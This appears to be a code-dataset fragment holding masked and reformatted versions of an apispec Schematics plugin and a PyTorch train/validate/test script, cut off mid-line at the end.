data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-4": "<mask token>\n\n\ndef resolver(schema):\n \"\"\"Default implementation of a schema name resolver function\n \"\"\"\n name = schema.__name__\n if name.endswith('Schema'):\n return name[:-6] or name\n return name\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"\n openapi.schematics\n ~~~~~~~~~~~~~~~~~~\n Schematics plugin for apispec based on ext.MarshmallowPlugin\n\"\"\"\nimport warnings\n\nfrom apispec import BasePlugin\nfrom .common import resolve_schema_instance, make_schema_key\nfrom .openapi import OpenAPIConverter\n\n\ndef resolver(schema):\n \"\"\"Default implementation of a schema name resolver function\n \"\"\"\n name = schema.__name__\n if name.endswith(\"Schema\"):\n return name[:-6] or name\n return name\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(\n openapi_version=spec.openapi_version,\n schema_name_resolver=self.schema_name_resolver,\n spec=spec,\n )\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(\n parameter.get(\"schema\", {}), dict\n ):\n schema_instance = resolve_schema_instance(parameter[\"schema\"])\n if \"in\" in parameter:\n del parameter[\"schema\"]\n resolved += self.openapi.schema2parameters(\n schema_instance, default_in=parameter.pop(\"in\"), **parameter\n )\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body[\"content\"]\n for content_type in content:\n schema = content[content_type][\"schema\"]\n content[content_type][\"schema\"] = self.openapi.resolve_schema_dict(schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n\n # OAS 2 component or OAS 3 header\n if \"schema\" in data:\n data[\"schema\"] = self.openapi.resolve_schema_dict(data[\"schema\"])\n # OAS 3 component except header\n if self.openapi_version.major >= 3:\n if \"content\" in data:\n for content_type in data[\"content\"]:\n schema = data[\"content\"][content_type][\"schema\"]\n data[\"content\"][content_type][\n \"schema\"\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n\n schema_instance = resolve_schema_instance(schema)\n\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n # In OpenAPIv3, this only works when using the complex form using \"content\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if \"headers\" in response:\n for header in response[\"headers\"].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if \"parameters\" in operation:\n operation[\"parameters\"] = self.resolve_parameters(\n operation[\"parameters\"]\n )\n if self.openapi_version.major >= 3:\n if \"requestBody\" in operation:\n self.resolve_schema_in_request_body(operation[\"requestBody\"])\n for response in operation.get(\"responses\", {}).values():\n self.resolve_schema(response)\n if \"headers\" in response:\n for header in response[\"headers\"].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n \"{} has already been added to the spec. Adding it twice may \"\n \"cause references to not resolve properly.\".format(schema_key[0]),\n UserWarning,\n )\n",
"step-ids": [
9,
12,
13,
14,
16
]
}
|
[
9,
12,
13,
14,
16
] |
from utils import *
import copy
import torch.nn as nn
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
net.train()
tl = Averager()
pred_train = []
act_train = []
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
tl.add(loss)
pred_train.extend(pred.data.tolist())
act_train.extend(y_batch.data.tolist())
optimizer.zero_grad()
loss.backward()
optimizer.step()
return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
net.eval()
pred_val = []
act_val = []
vl = Averager()
with torch.no_grad():
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
vl.add(loss.item())
pred_val.extend(pred.data.tolist())
act_val.extend(y_batch.data.tolist())
return vl.item(), pred_val, act_val
def set_up(args):
set_gpu(args.gpu)
ensure_path(args.save_path)
torch.manual_seed(args.random_seed)
torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
seed_all(args.random_seed)
save_name = '_sub' + str(subject) + '_trial' + str(fold)
set_up(args)
train_loader = get_dataloader(data_train, label_train, args.batch_size)
val_loader = get_dataloader(data_val, label_val, args.batch_size)
model = get_model(args)
para = get_trainable_parameter_num(model)
print('Model {} size:{}'.format(args.model, para))
if CUDA:
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
loss_fn = nn.CrossEntropyLoss()
def save_model(name):
previous_model = osp.join(args.save_path, '{}.pth'.format(name))
if os.path.exists(previous_model):
os.remove(previous_model)
torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
trlog = {}
trlog['args'] = vars(args)
trlog['train_loss'] = []
trlog['val_loss'] = []
trlog['train_acc'] = []
trlog['val_acc'] = []
trlog['max_acc'] = 0.0
timer = Timer()
for epoch in range(1, args.max_epoch + 1):
loss_train, pred_train, act_train = train_one_epoch(
data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
.format(epoch, loss_train, acc_train, f1_train))
loss_val, pred_val, act_val = predict(
data_loader=val_loader, net=model, loss_fn=loss_fn
)
acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
format(epoch, loss_val, acc_val, f1_val))
if acc_val > trlog['max_acc']:
trlog['max_acc'] = acc_val
save_model('max-acc')
if args.save_model:
# save model here for reproduce
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
torch.save(model.state_dict(), model_name_reproduce)
trlog['train_loss'].append(loss_train)
trlog['train_acc'].append(acc_train)
trlog['val_loss'].append(loss_val)
trlog['val_acc'].append(acc_val)
print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
subject, fold))
save_name_ = 'trlog' + save_name
ensure_path(osp.join(args.save_path, 'log_train'))
torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))
return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
seed_all(args.random_seed)
set_up(args)
test_loader = get_dataloader(data, label, args.batch_size, False)
model = get_model(args)
if CUDA:
model = model.cuda()
loss_fn = nn.CrossEntropyLoss()
if reproduce:
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
model.load_state_dict(torch.load(model_name_reproduce))
else:
model.load_state_dict(torch.load(args.load_path))
loss, pred, act = predict(
data_loader=test_loader, net=model, loss_fn=loss_fn
)
acc, f1, cm = get_metrics(y_pred=pred, y_true=act)
print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))
return acc, pred, act
|
normal
|
{
"blob_id": "6ef78e4308f6e693f50df714a5d7af1785e49d7a",
"index": 7682,
"step-1": "<mask token>\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\n<mask token>\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-2": "<mask token>\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-3": "<mask token>\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-4": "from utils import *\nimport copy\nimport torch.nn as nn\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = 